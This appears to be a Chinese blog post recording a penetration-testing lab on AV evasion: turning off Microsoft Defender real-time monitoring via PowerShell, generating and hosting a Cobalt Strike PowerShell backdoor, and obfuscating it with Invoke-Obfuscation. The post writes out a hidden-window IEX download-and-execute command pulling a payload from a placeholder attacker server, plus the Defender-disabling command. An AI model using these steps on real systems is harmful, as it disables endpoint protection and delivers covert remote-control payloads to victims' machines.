利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀

目录

一、实验内容

二、实验环境

三、实验过程与分析

附invoke-obfuscation的部分操作指令:


前言:记录渗透学习中的实验过程

一、实验内容

1、利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
 

二、实验环境

操作环境:Windows10、kali

软件:Cobaltstrike、Invoke-Obfuscation

三、实验过程与分析

1、 利用Cobaltstrike生成Powershell恶意脚本,并通过Powershell关闭Microsoft Defender防病毒软件以达到免杀目的

关闭防病毒软件实时扫描功能——>输入Set-ExecutionPolicy Unrestricted

改变当前的 PowerShell 环境的权限设置(注意,此命令需要在管理员权限的powershell 下运行)

命令解释

- Unrestricted: 允许所有的脚本运行, 但是在运行前会提示是否进行操作

尽管Microsoft Defender提供了禁用杀毒软件的命令,但它受防篡改功能的保护,你只能通过Windows安全应用程序中提供的“病毒和威胁防护”设置来禁用它。

若要禁用防病毒,请关闭“防篡改”,然后使用以下步骤:

Set-MpPreference -DisableRealtimeMonitoring $true

完成这些步骤后,实时防病毒保护将被禁用,直到下次重新启动为止。

2、cs中生成powershell脚本

打开cs,按图示点击

然后生成powershell后门

选择保存路径

文件托管中,选择刚生成的powershell文件

端口选择

成功启动服务

 

2、利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀

先在powershell中执行Set-ExecutionPolicy Unrestricted(预防后面报错)

然后选择输入A(全是)

①接着用PowerShell的import-module命令导入Invoke-Obfuscation模块

②或者先切换到Invoke-Obfuscation的文件夹,然后执行Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation

①②任选一种方法即可

。。。。。。(跳过下面这个无法执行的part)

设置目标脚本文件(出现下图这个红字警告时,.ps1文件大概率已经没啦)

输入set scriptpath C:\Users\XG\Documents\payload.ps1

设置并选择混淆方式

。。。。。。(无法执行的part结束)

前面红字报错的地方,换一条命令输入(这条命令可以成功执行)

set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'

注:这条命令里的80改为自己设置的powershell脚本的端口号

http://x.x.x.x 改为在cs文件托管【成功启动服务】后生成的url地址

然后输入encoding选择编码方式(成功执行!!!)

输出混淆后的脚本

(会自动弹出混淆后的脚本)

附invoke-obfuscation的部分操作指令:

输入back可返回上一级目录

输入undo可撤销上次命令(比如重新指定编码方式的时候,就可以使用)

  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值